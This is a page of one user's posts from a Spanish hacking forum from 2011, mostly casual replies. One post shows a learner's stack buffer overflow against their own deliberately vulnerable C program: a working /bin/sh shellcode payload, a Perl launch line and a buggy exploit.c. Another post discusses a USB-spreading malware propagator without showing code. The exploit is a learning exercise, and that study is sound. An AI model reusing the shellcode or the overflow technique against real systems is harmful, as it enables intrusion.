elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Mensajes
Páginas: 1 ... 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 [51] 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 ... 125
501  Seguridad Informática / Hacking / Re: como puedo saber el user y pass del router en: 23 Enero 2011, 00:13 am
¿? Resetear no tiene ningun peligro. Si tuviesen, por lo que sea acceder al router, no necesitarias pass, porque seria 1234...
Lee todos los comentarios...
Al resetear TODO se pone por defecto... Por defecto un router funciona muy bien.
502  Seguridad Informática / Bugs y Exploits / [First BoF Linux attack : Sagrini 2010 : elhacker.net] [Funciona!!!] en: 22 Enero 2011, 17:50 pm
Bueno, ahi va el titulo, la cosa es que tengo un programita con una vulnerabilidad y lo estoy explotando. El otro dia consegui manejar el transcurso de la aplicacion, y ahora abrir una shellcode...
Lo hago asi:
Código:
 ./vuln [23 NOPS + 25 Shellcode + 4 RET]
La idea la saque de un post antiguo del foro... Evidentemente se puede cambiar la posicion de los Nops, pero bueno...

Bueno, consigo la shellcode al correrlo asi:
Código:
./vuln $(perl -e 'print "\x90"x23 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"."\x18\x1f\x9b\xbf"')
$
Pero a la hora de hacer el exploit...
Código:
juanra@Juanra:~/Escritorio/Shell$ gcc -o exploit exploit.c
juanra@Juanra:~/Escritorio/Shell$ ./exploit
Fallo de segmentación
juanra@Juanra:~/Escritorio/Shell$ gdb -q exploit
(gdb) r
Starting program: /home/juanra/Escritorio/Shell/exploit 

Program received signal SIGSEGV, Segmentation fault.
0xb77521f4 in strcpy () from /lib/tls/i686/cmov/libc.so.6
(gdb)

Tengo este codigo, en el que también va como comentario el vulnerable...
Código
  1. /*
  2. First BoF Linux attack : Sagrini 2010 : elhacker.net
  3. 23 Nops + 25 Shellcode + 4 Ret = 52 [48 Buffer + Ret] + 7 ["./vuln "] = 59
  4.  
  5. gcc -o vuln vuln.c --no-stack-protector -g -z execstack
  6. ./vuln $(perl -e 'print "\x90"x23 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"."\x18\x1f\x9b\xbf"')
  7. $
  8.  
  9. gcc -o exploit exploit.c
  10. ./exploit
  11. $
  12.  
  13. ------------------------------------------
  14. !!! Vuln code !!!
  15. #include <stdio.h>
  16. #include <stdlib.h>
  17. #include <string.h>
  18.  
  19. void soy_vuln(char *arg)
  20. {
  21. 	char buffer [48];
  22. 	strcpy (buffer, arg);
  23. }
  24.  
  25. int main(int argc, char *argv[])
  26. {
  27. 	if (argc != 2) return 1;
  28. 	soy_vuln(argv[1]);
  29. }
  30. ------------------------------------------
  31. */
  32.  
  33. #include <stdio.h>
  34. #include <string.h>
  35.  
  36. int main ()
  37. {
  38. 	printf ("First BoF Linux attack : Sagrini 2010 : elhacker.net");
  39.  
  40. 	char nops [23];
  41. 	memset (nops, '\x90', 23);
  42. 	char shellcode [25] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
  43. 	char ret [4] = "\x18\x1f\x9b\xbf";
  44.  
  45. 	char command [59];
  46. 	strcpy (command, "./vuln ");
  47. 	strcpy (command, nops);
  48. 	strcpy (command, shellcode);
  49. 	strcpy (command, ret);
  50. 	execve (command, command, NULL);
  51.  
  52. 	return 0;
  53. }
  54.  
  55.  

Ahora mi pregunta es... ¿Qué falla?
503  Programación / Programación General / Re: Lenguajes de programación con futuro en: 22 Enero 2011, 17:37 pm
Para mi C, Java, ASM (siempre sera necesario) y Perl...
Aparte C++, PHP y Pascal...

Es mi humilde opinion, nada mas xD
504  Seguridad Informática / Análisis y Diseño de Malware / Re: Mi nuevo propagador, por usb!! en: 22 Enero 2011, 17:30 pm
Citar
sagrini, yo no digo que se haga en batch, he dicho que lo he hecho en Pascal.
Sobre lo que se comenta de batch nose, pero si suplantan un exe por un batch el icono canta que no veas...
fff menos mal es que como estamos hablando con Batch... Ya decia yo...
Yo lo haria en C de todos modos Pascal no me resulta muy conocido  ;)

Sobre el nuevo code... lo has escrito tu? Yo lo haria con APIs de C, que son algo mas extensas... Pero creo que tu code no funciona  :-\ No estamos buscando eso exactamente  :P

Lord RNA podrias enseñarme el code? Es por verlo, si quieres...
@skapunky ahora en un ratillo podria hacer el primer programa en C, y listo...
505  Foros Generales / Foro Libre / Re: Yo quiero ser Inmortal - NO quiero morir ¿y TU? en: 22 Enero 2011, 17:21 pm
Cita de: Draklit en 22 Enero 2011, 16:59 pm
Sólo imagina presenciar los conflictos que causa el hombre por diez mil años, y, si los demás son inmortales también, imagina el problema que vendría debido a los nacimientos; si los demás no son inmortales, imagina ver a toda la gente amada morir, volver a amar, y verlos morir de nuevo.

Imagina ver todos los problemas que ves día a día, durante un plazo cien veces más largo. Escuchar las mismas historias de crueldad, ver la brutalidad de eventos que ocurren, y si sufres por alguna causa que no te abandone el resto de la vida, creeme, querrás morir.
+1 algo asi pasa en las pelis de zombis cuando estas solo. Te pegas un tiro y ya está jeje...
Estoy de acuerdo contigo  :)

Yo como he dicho antes me mataria...
506  Foros Generales / Noticias / Re: El drama de la Wikipedia: neutralidad y endogamia en: 22 Enero 2011, 16:51 pm
Cita de: Xafirot en 22 Enero 2011, 16:23 pm
El universon se creo y yasta es una de esas cosas que nunca sabremos

No estoy de acuerdo, Dios nos ha dado una inteligencia, y no nos ha velado nada. Si alguien lo descubre te digo yo que a Dios no le importara... Es mas, para algo nos ha dado la inteligencia no?
Otra cosa son algunos misterios que si que nunca sabremos, hasta que nos muramos, como la Santisima Trinidad, etc... Eso es porque nuestra inteligencia no nos llega a tanto. Pero algun dia en el cielo lo sabremos  :) mas que nada porque veremos a Dios...
507  Seguridad Informática / Bugs y Exploits / Re: Herramienta seguridad informatica (Exploits) en: 22 Enero 2011, 16:40 pm
Cierto jeje que raro que
Citar
Fecha de registro:    Hoy a las 03:05:16
Última vez activo:    Hoy a las 03:20:53
De todos modos nos hacen un favor poniendo 20 €. Asi habra menos script-kiddies  :-*
Yo prefiero usar GDB... esa herramienta es como Metasploit  :¬¬
508  Foros Generales / Dudas Generales / Re: Ayuda para bajar videos de telemadrid en: 22 Enero 2011, 16:38 pm
Usas linux u Win32?
Código:
Linux --> http://foro.elhacker.net/programacion_general/ehndev_2010_concurso_de_desarrollo_de_aplicaciones_hilo_oficial-t308347.0.html
Windows --> http://www.taringa.net/posts/downloads/6300256/Programas-para-descargar-videos-de-YouTube.html

Porfavor la proxima vez busca antes de preguntar... Hay miles de preguntas asi...
509  Foros Generales / Foro Libre / Re: Yo quiero ser Inmortal - NO quiero morir ¿y TU? en: 22 Enero 2011, 16:36 pm
Claro que si, pero eso no signifca que queramos ser inmortales... Evidentemente.
Has pensado en lo que seria no morirte?
510  Foros Generales / Noticias / Re: Alejandro Sanz a los críticos de la ley Sinde: "Si no tienen huevos cállense,... en: 22 Enero 2011, 16:09 pm
Yo no entiendo como puede tener fans siendo tan mal cantante
y como puede ir y decir eso en una accion caricativa? Haces la accion caritativa por decir eso o eso por la accion caritativa?
Páginas: 1 ... 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 [51] 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 ... 125
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines